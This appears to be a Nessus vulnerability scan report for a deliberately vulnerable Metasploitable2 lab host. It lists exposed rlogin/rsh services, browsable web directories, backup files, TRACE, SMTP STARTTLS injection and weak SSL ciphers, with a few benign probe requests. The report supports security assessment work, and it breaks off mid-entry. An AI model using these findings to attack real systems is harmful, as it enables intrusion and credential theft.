The rlogin service is running on the remote host. This service is vulnerable since data is passed between the rlogin client and server in cleartext. A man-in-the-middle attacker can exploit this to sniff logins and passwords. Also, it may allow poorly authenticated logins without passwords. If the host is vulnerable to TCP sequence number guessing (from any network) or IP spoofing (including ARP hijacking on a local network) then it may be possible to bypass authentication.
Finally, rlogin is an easy way to turn file-write access into full logins through the .rhosts or rhosts.equiv files.
Solution
Comment out the 'login' line in /etc/inetd.conf and restart the inetd process. Alternatively, disable this service and use SSH instead.
Risk Factor
High
VPR Score
6.7
EPSS Score
0.4664
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
References
Exploitable With
Metasploit (true)
Plugin Information
Published: 1999/08/30, Modified: 2022/04/11
Plugin Output

tcp/513/rlogin

10245 - rsh Service Detection
-
Synopsis
The rsh service is running on the remote host.
Description
The rsh service is running on the remote host. This service is vulnerable since data is passed between the rsh client and server in cleartext. A man-in-the-middle attacker can exploit this to sniff logins and passwords. Also, it may allow poorly authenticated logins without passwords. If the host is vulnerable to TCP sequence number guessing (from any network) or IP spoofing (including ARP hijacking on a local network) then it may be possible to bypass authentication.
Finally, rsh is an easy way to turn file-write access into full logins through the .rhosts or rhosts.equiv files.
Solution
Comment out the 'rsh' line in /etc/inetd.conf and restart the inetd process. Alternatively, disable this service and use SSH instead.
Risk Factor
High
VPR Score
6.7
EPSS Score
0.4664
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
References
Exploitable With
Metasploit (true)
Plugin Information
Published: 1999/08/22, Modified: 2022/04/11
Plugin Output

tcp/514/rsh

12085 - Apache Tomcat Default Files
-
Synopsis
The remote web server contains default files.
Description
The default error page, default index page, example JSPs and/or example servlets are installed on the remote Apache Tomcat server. These files should be removed as they may help an attacker uncover information about the remote Tomcat install or host itself.
See Also
Solution
Delete the default index page and remove the example JSP and servlets. Follow the Tomcat or OWASP instructions to replace or modify the default error page.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2004/03/02, Modified: 2024/09/03
Plugin Output

tcp/8180/www


The following default files were found :

http://metasploitable2.sicurform:8180/tomcat-docs/index.html

The server is not configured to return a custom page in the event of a client requesting a non-existent resource.
This may result in a potential disclosure of sensitive information about the server to attackers.

11411 - Backup Files Disclosure
-
Synopsis
It is possible to retrieve file backups from the remote web server.
Description
By appending various suffixes (ie: .old, .bak, ~, etc...) to the names of various files on the remote host, it seems possible to retrieve their contents, which may result in disclosure of sensitive information.
See Also
Solution
Ensure the files do not contain any sensitive information, such as credentials to connect to a database, and delete or protect those files that should not be accessible.
Risk Factor
Medium
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2003/03/17, Modified: 2023/07/10
Plugin Output

tcp/80/www


It is possible to read the following backup files :

- File : /twiki/bin/view/Main/WebHome~
URL : http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome~

- File : /twiki/bin/search/Main/SearchResult~
URL : http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult~
40984 - Browsable Web Directories
-
Synopsis
Some directories on the remote web server are browsable.
Description
Multiple Nessus plugins identified directories on the web server that are browsable.
See Also
Solution
Make sure that browsable directories do not leak confidential information or give access to sensitive resources. Additionally, use access restrictions or disable directory indexing for any that do.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2009/09/15, Modified: 2021/01/19
Plugin Output

tcp/80/www


The following directories are browsable :

http://metasploitable2.sicurform/dav/
http://metasploitable2.sicurform/dvwa/dvwa/
http://metasploitable2.sicurform/dvwa/dvwa/css/
http://metasploitable2.sicurform/dvwa/dvwa/images/
http://metasploitable2.sicurform/dvwa/dvwa/includes/
http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/
http://metasploitable2.sicurform/dvwa/dvwa/js/
http://metasploitable2.sicurform/mutillidae/documentation/
http://metasploitable2.sicurform/mutillidae/styles/
http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/
http://metasploitable2.sicurform/test/
http://metasploitable2.sicurform/test/testoutput/
11213 - HTTP TRACE / TRACK Methods Allowed
-
Synopsis
Debugging functions are enabled on the remote web server.
Description
The remote web server supports the TRACE and/or TRACK methods. TRACE and TRACK are HTTP methods that are used to debug web server connections.
See Also
Solution
Disable these HTTP methods. Refer to the plugin output for more information.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVSS v3.0 Temporal Score
4.6 (CVSS:3.0/E:U/RL:O/RC:C)
VPR Score
4.0
EPSS Score
0.8269
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
3.7 (CVSS2#E:U/RL:OF/RC:C)
References
BID 9506
BID 9561
BID 11604
BID 33374
BID 37995
CVE CVE-2003-1567
CVE CVE-2004-2320
CVE CVE-2010-0386
XREF CERT:288308
XREF CERT:867593
XREF CWE:16
XREF CWE:200
Plugin Information
Published: 2003/01/23, Modified: 2024/04/09
Plugin Output

tcp/80/www


To disable these methods, add the following lines for each virtual
host in your configuration file :

RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

Alternatively, note that Apache versions 1.3.34, 2.0.55, and 2.2
support disabling the TRACE method natively via the 'TraceEnable'
directive.

Nessus sent the following TRACE request : \n\n------------------------------ snip ------------------------------\nTRACE /Nessus1538077030.html HTTP/1.1
Connection: Close
Host: metasploitable2.sicurform
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

------------------------------ snip ------------------------------\n\nand received the following response from the remote server :\n\n------------------------------ snip ------------------------------\nHTTP/1.1 200 OK
Date: Thu, 19 Jun 2025 09:37:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: message/http


TRACE /Nessus1538077030.html HTTP/1.1
Connection: Keep-Alive
Host: metasploitable2.sicurform
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

------------------------------ snip ------------------------------\n

50686 - IP Forwarding Enabled
-
Synopsis
The remote host has IP forwarding enabled.
Description
The remote host has IP forwarding enabled. An attacker can exploit this to route packets through the host and potentially bypass some firewalls / routers / NAC filtering.

Unless the remote host is a router, it is recommended that you disable IP forwarding.
Solution
On Linux, you can disable IP forwarding by doing :

echo 0 > /proc/sys/net/ipv4/ip_forward

On Windows, set the key 'IPEnableRouter' to 0 under

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters

On Mac OS X, you can disable IP forwarding by executing the command :

sysctl -w net.inet.ip.forwarding=0

For other systems, check with your vendor.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L)
VPR Score
4.0
EPSS Score
0.0596
CVSS v2.0 Base Score
5.8 (CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P)
References
Plugin Information
Published: 2010/11/23, Modified: 2023/10/17
Plugin Output

tcp/0

IP forwarding appears to be enabled on the remote host.

Detected local MAC Address : 0242ac130004
Response from local MAC Address : 0242ac130004

Detected Gateway MAC Address : 0242ac130002
Response from Gateway MAC Address : 0242ac130002

46803 - PHP expose_php Information Disclosure
-
Synopsis
The configuration of PHP on the remote host allows disclosure of sensitive information.
Description
The PHP install on the remote server is configured in a way that allows disclosure of potentially sensitive information to an attacker through a special URL. Such a URL triggers an Easter egg built into PHP itself.

Other such Easter eggs likely exist, but Nessus has not checked for them.
See Also
Solution
In the PHP configuration file, php.ini, set the value for 'expose_php' to 'Off' to disable this behavior. Restart the web server daemon to put this change into effect.
Risk Factor
Medium
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2010/06/03, Modified: 2022/04/11
Plugin Output

tcp/80/www


Nessus was able to verify the issue using the following URL :

http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/DBMS.php/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

57608 - SMB Signing not required
-
Synopsis
Signing is not required on the remote SMB server.
Description
Signing is not required on the remote SMB server. An unauthenticated, remote attacker can exploit this to conduct man-in-the-middle attacks against the SMB server.
See Also
Solution
Enforce message signing in the host's configuration. On Windows, this is found in the policy setting 'Microsoft network server: Digitally sign communications (always)'. On Samba, the setting is called 'server signing'. See the 'see also' links for further details.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
CVSS v3.0 Temporal Score
4.6 (CVSS:3.0/E:U/RL:O/RC:C)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
CVSS v2.0 Temporal Score
3.7 (CVSS2#E:U/RL:OF/RC:C)
Plugin Information
Published: 2012/01/19, Modified: 2022/10/05
Plugin Output

tcp/445/cifs

52611 - SMTP Service STARTTLS Plaintext Command Injection
-
Synopsis
The remote mail service allows plaintext command injection while negotiating an encrypted communications channel.
Description
The remote SMTP service contains a software flaw in its STARTTLS implementation that could allow a remote, unauthenticated attacker to inject commands during the plaintext protocol phase that will be executed during the ciphertext protocol phase.

Successful exploitation could allow an attacker to steal a victim's email or associated SASL (Simple Authentication and Security Layer) credentials.
See Also
Solution
Contact the vendor to see if an update is available.
Risk Factor
Medium
VPR Score
7.3
EPSS Score
0.6945
CVSS v2.0 Base Score
4.0 (CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:N)
CVSS v2.0 Temporal Score
3.1 (CVSS2#E:POC/RL:OF/RC:C)
References
Plugin Information
Published: 2011/03/10, Modified: 2019/03/06
Plugin Output

tcp/25/smtp


Nessus sent the following two commands in a single packet :

STARTTLS\r\nRSET\r\n

And the server sent the following two responses :

220 2.0.0 Ready to start TLS
250 2.0.0 Ok

90317 - SSH Weak Algorithms Supported
-
Synopsis
The remote SSH server is configured to allow weak encryption algorithms or no algorithm at all.
Description
Nessus has detected that the remote SSH server is configured to use the Arcfour stream cipher or no cipher at all. RFC 4253 advises against using Arcfour due to an issue with weak keys.
See Also
Solution
Contact the vendor or consult product documentation to remove the weak ciphers.
Risk Factor
Medium
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2016/04/04, Modified: 2016/12/14
Plugin Output

tcp/22/ssh


The following weak server-to-client encryption algorithms are supported :

arcfour
arcfour128
arcfour256

The following weak client-to-server encryption algorithms are supported :

arcfour
arcfour128
arcfour256

31705 - SSL Anonymous Cipher Suites Supported
-
Synopsis
The remote service supports the use of anonymous SSL ciphers.
Description
The remote host supports the use of anonymous SSL ciphers. While this enables an administrator to set up a service that encrypts traffic without having to generate and configure SSL certificates, it offers no way to verify the remote host's identity and renders the service vulnerable to a man-in-the-middle attack.

Note: This is considerably easier to exploit if the attacker is on the same physical network.
See Also
Solution
Reconfigure the affected application if possible to avoid use of weak ciphers.
Risk Factor
Low
CVSS v3.0 Base Score
5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSS v3.0 Temporal Score
5.2 (CVSS:3.0/E:U/RL:O/RC:C)
VPR Score
4.4
EPSS Score
0.027
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
1.9 (CVSS2#E:U/RL:OF/RC:C)
References
Plugin Information
Published: 2008/03/28, Modified: 2023/10/27
Plugin Output

tcp/25/smtp


The following is a list of SSL anonymous ciphers supported by the remote TCP server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
ADH-AES128-SHA 0x00, 0x34 DH None AES-CBC(128) SHA1
ADH-AES256-SHA 0x00, 0x3A DH None AES-CBC(256) SHA1
ADH-RC4-MD5 0x00, 0x18 DH None RC4(128) MD5

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}
51192 - SSL Certificate Cannot Be Trusted
-
Synopsis
The SSL certificate for this service cannot be trusted.
Description
The server's X.509 certificate cannot be trusted. This situation can occur in three different ways, in which the chain of trust can be broken, as stated below :

- First, the top of the certificate chain sent by the server might not be descended from a known public certificate authority. This can occur either when the top of the chain is an unrecognized, self-signed certificate, or when intermediate certificates are missing that would connect the top of the certificate chain to a known public certificate authority.

- Second, the certificate chain may contain a certificate that is not valid at the time of the scan. This can occur either when the scan occurs before one of the certificate's 'notBefore' dates, or after one of the certificate's 'notAfter' dates.

- Third, the certificate chain may contain a signature that either didn't match the certificate's information or could not be verified. Bad signatures can be fixed by getting the certificate with the bad signature to be re-signed by its issuer. Signatures that could not be verified are the result of the certificate's issuer using a signing algorithm that Nessus either does not support or does not recognize.

If the remote host is a public host in production, any break in the chain makes it more difficult for users to verify the authenticity and identity of the web server. This could make it easier to carry out man-in-the-middle attacks against the remote host.
See Also
Solution
Purchase or generate a proper SSL certificate for this service.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
CVSS v2.0 Base Score
6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)
Plugin Information
Published: 2010/12/15, Modified: 2025/06/16
Plugin Output

tcp/25/smtp


The following certificate was part of the certificate chain
sent by the remote host, but it has expired :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Not After : Apr 16 14:07:45 2010 GMT

The following certificate was at the top of the certificate
chain sent by the remote host, but it is signed by an unknown
certificate authority :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Issuer : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

51192 - SSL Certificate Cannot Be Trusted
-
Synopsis
The SSL certificate for this service cannot be trusted.
Description
The server's X.509 certificate cannot be trusted. This situation can occur in three different ways, in which the chain of trust can be broken, as stated below :

- First, the top of the certificate chain sent by the server might not be descended from a known public certificate authority. This can occur either when the top of the chain is an unrecognized, self-signed certificate, or when intermediate certificates are missing that would connect the top of the certificate chain to a known public certificate authority.

- Second, the certificate chain may contain a certificate that is not valid at the time of the scan. This can occur either when the scan occurs before one of the certificate's 'notBefore' dates, or after one of the certificate's 'notAfter' dates.

- Third, the certificate chain may contain a signature that either didn't match the certificate's information or could not be verified. Bad signatures can be fixed by getting the certificate with the bad signature to be re-signed by its issuer. Signatures that could not be verified are the result of the certificate's issuer using a signing algorithm that Nessus either does not support or does not recognize.

If the remote host is a public host in production, any break in the chain makes it more difficult for users to verify the authenticity and identity of the web server. This could make it easier to carry out man-in-the-middle attacks against the remote host.
See Also
Solution
Purchase or generate a proper SSL certificate for this service.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
CVSS v2.0 Base Score
6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)
Plugin Information
Published: 2010/12/15, Modified: 2025/06/16
Plugin Output

tcp/5432/postgresql


The following certificate was part of the certificate chain
sent by the remote host, but it has expired :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Not After : Apr 16 14:07:45 2010 GMT

The following certificate was at the top of the certificate
chain sent by the remote host, but it is signed by an unknown
certificate authority :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain
|-Issuer : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

15901 - SSL Certificate Expiry
-
Synopsis
The remote server's SSL certificate has already expired.
Description
This plugin checks expiry dates of certificates associated with SSL- enabled services on the target and reports whether any have already expired.
Solution
Purchase or generate a new SSL certificate to replace the existing one.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
Plugin Information
Published: 2004/12/03, Modified: 2021/02/03
Plugin Output

tcp/25/smtp


The SSL certificate has already expired :

Subject : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Issuer : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Not valid before : Mar 17 14:07:45 2010 GMT
Not valid after : Apr 16 14:07:45 2010 GMT

15901 - SSL Certificate Expiry
-
Synopsis
The remote server's SSL certificate has already expired.
Description
This plugin checks expiry dates of certificates associated with SSL- enabled services on the target and reports whether any have already expired.
Solution
Purchase or generate a new SSL certificate to replace the existing one.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
Plugin Information
Published: 2004/12/03, Modified: 2021/02/03
Plugin Output

tcp/5432/postgresql


The SSL certificate has already expired :

Subject : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Issuer : C=XX, ST=There is no such thing outside US, L=Everywhere, O=OCOSA, OU=Office for Complication of Otherwise Simple Affairs, CN=ubuntu804-base.localdomain, emailAddress=root@ubuntu804-base.localdomain
Not valid before : Mar 17 14:07:45 2010 GMT
Not valid after : Apr 16 14:07:45 2010 GMT

45411 - SSL Certificate with Wrong Hostname
-
Synopsis
The SSL certificate for this service is for a different host.
Description
The 'commonName' (CN) attribute of the SSL certificate presented for this service is for a different machine.
Solution
Purchase or generate a proper SSL certificate for this service.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
Plugin Information
Published: 2010/04/03, Modified: 2020/04/27
Plugin Output

tcp/25/smtp


The identities known by Nessus are :

04cbebc48a57
04cbebc48a57.sicurform
172.19.0.2
metasploitable2.sicurform

The Common Name in the certificate is :

ubuntu804-base.localdomain

45411 - SSL Certificate with Wrong Hostname
-
Synopsis
The SSL certificate for this service is for a different host.
Description
The 'commonName' (CN) attribute of the SSL certificate presented for this service is for a different machine.
Solution
Purchase or generate a proper SSL certificate for this service.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
Plugin Information
Published: 2010/04/03, Modified: 2020/04/27
Plugin Output

tcp/5432/postgresql


The identities known by Nessus are :

04cbebc48a57
04cbebc48a57.sicurform
172.19.0.2
metasploitable2.sicurform

The Common Name in the certificate is :

ubuntu804-base.localdomain

89058 - SSL DROWN Attack Vulnerability (Decrypting RSA with Obsolete and Weakened eNcryption)
-
Synopsis
The remote host may be affected by a vulnerability that allows a remote attacker to potentially decrypt captured TLS traffic.
Description
The remote host supports SSLv2 and therefore may be affected by a vulnerability that allows a cross-protocol Bleichenbacher padding oracle attack known as DROWN (Decrypting RSA with Obsolete and Weakened eNcryption). This vulnerability exists due to a flaw in the Secure Sockets Layer Version 2 (SSLv2) implementation, and it allows captured TLS traffic to be decrypted. A man-in-the-middle attacker can exploit this to decrypt the TLS connection by utilizing previously captured traffic and weak cryptography along with a series of specially crafted connections to an SSLv2 server that uses the same private key.
See Also
Solution
Disable SSLv2 and export grade cryptography cipher suites. Ensure that private keys are not used anywhere with server software that supports SSLv2 connections.
Risk Factor
Medium
CVSS v3.0 Base Score
5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSS v3.0 Temporal Score
5.2 (CVSS:3.0/E:U/RL:O/RC:C)
VPR Score
3.6
EPSS Score
0.8991
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
3.2 (CVSS2#E:U/RL:OF/RC:C)
References
BID 83733
CVE CVE-2016-0800
XREF CERT:583776
Plugin Information
Published: 2016/03/01, Modified: 2025/04/04
Plugin Output

tcp/25/smtp


The remote host is affected by SSL DROWN and supports the following
vulnerable cipher suites :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 0x04, 0x00, 0x80 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 0x01, 0x00, 0x80 RSA RSA RC4(128) MD5

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}
65821 - SSL RC4 Cipher Suites Supported (Bar Mitzvah)
-
Synopsis
The remote service supports the use of the RC4 cipher.
Description
The remote host supports the use of RC4 in one or more cipher suites.
The RC4 cipher is flawed in its generation of a pseudo-random stream of bytes so that a wide variety of small biases are introduced into the stream, decreasing its randomness.

If plaintext is repeatedly encrypted (e.g., HTTP cookies), and an attacker is able to obtain many (i.e., tens of millions) ciphertexts, the attacker may be able to derive the plaintext.
See Also
Solution
Reconfigure the affected application, if possible, to avoid use of RC4 ciphers. Consider using TLS 1.2 with AES-GCM suites subject to browser and web server support.
Risk Factor
Medium
CVSS v3.0 Base Score
5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSS v3.0 Temporal Score
5.4 (CVSS:3.0/E:U/RL:X/RC:C)
VPR Score
7.3
EPSS Score
0.9303
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
4.2 (CVSS2#E:U/RL:ND/RC:C)
References
Plugin Information
Published: 2013/04/05, Modified: 2025/05/09
Plugin Output

tcp/25/smtp


List of RC4 cipher suites supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 0x01, 0x00, 0x80 RSA RSA RC4(128) MD5
ADH-RC4-MD5 0x00, 0x18 DH None RC4(128) MD5
RC4-MD5 0x00, 0x04 RSA RSA RC4(128) MD5
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

65821 - SSL RC4 Cipher Suites Supported (Bar Mitzvah)
-
Synopsis
The remote service supports the use of the RC4 cipher.
Description
The remote host supports the use of RC4 in one or more cipher suites.
The RC4 cipher is flawed in its generation of a pseudo-random stream of bytes so that a wide variety of small biases are introduced into the stream, decreasing its randomness.

If plaintext is repeatedly encrypted (e.g., HTTP cookies), and an attacker is able to obtain many (i.e., tens of millions) ciphertexts, the attacker may be able to derive the plaintext.
See Also
Solution
Reconfigure the affected application, if possible, to avoid use of RC4 ciphers. Consider using TLS 1.2 with AES-GCM suites subject to browser and web server support.
Risk Factor
Medium
CVSS v3.0 Base Score
5.9 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSS v3.0 Temporal Score
5.4 (CVSS:3.0/E:U/RL:X/RC:C)
VPR Score
7.3
EPSS Score
0.9303
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
4.2 (CVSS2#E:U/RL:ND/RC:C)
References
Plugin Information
Published: 2013/04/05, Modified: 2025/05/09
Plugin Output

tcp/5432/postgresql


List of RC4 cipher suites supported by the remote server :

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

57582 - SSL Self-Signed Certificate
-
Synopsis
The SSL certificate chain for this service ends in an unrecognized self-signed certificate.
Description
The X.509 certificate chain for this service is not signed by a recognized certificate authority. If the remote host is a public host in production, this nullifies the use of SSL as anyone could establish a man-in-the-middle attack against the remote host.

Note that this plugin does not check for certificate chains that end in a certificate that is not self-signed, but is signed by an unrecognized certificate authority.
Solution
Purchase or generate a proper SSL certificate for this service.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
CVSS v2.0 Base Score
6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)
Plugin Information
Published: 2012/01/17, Modified: 2022/06/14
Plugin Output

tcp/25/smtp


The following certificate was found at the top of the certificate
chain sent by the remote host, but is self-signed and was not
found in the list of known certificate authorities :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

57582 - SSL Self-Signed Certificate
-
Synopsis
The SSL certificate chain for this service ends in an unrecognized self-signed certificate.
Description
The X.509 certificate chain for this service is not signed by a recognized certificate authority. If the remote host is a public host in production, this nullifies the use of SSL as anyone could establish a man-in-the-middle attack against the remote host.

Note that this plugin does not check for certificate chains that end in a certificate that is not self-signed, but is signed by an unrecognized certificate authority.
Solution
Purchase or generate a proper SSL certificate for this service.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
CVSS v2.0 Base Score
6.4 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N)
Plugin Information
Published: 2012/01/17, Modified: 2022/06/14
Plugin Output

tcp/5432/postgresql


The following certificate was found at the top of the certificate
chain sent by the remote host, but is self-signed and was not
found in the list of known certificate authorities :

|-Subject : C=XX/ST=There is no such thing outside US/L=Everywhere/O=OCOSA/OU=Office for Complication of Otherwise Simple Affairs/CN=ubuntu804-base.localdomain/E=root@ubuntu804-base.localdomain

26928 - SSL Weak Cipher Suites Supported
-
Synopsis
The remote service supports the use of weak SSL ciphers.
Description
The remote host supports the use of SSL ciphers that offer weak encryption.

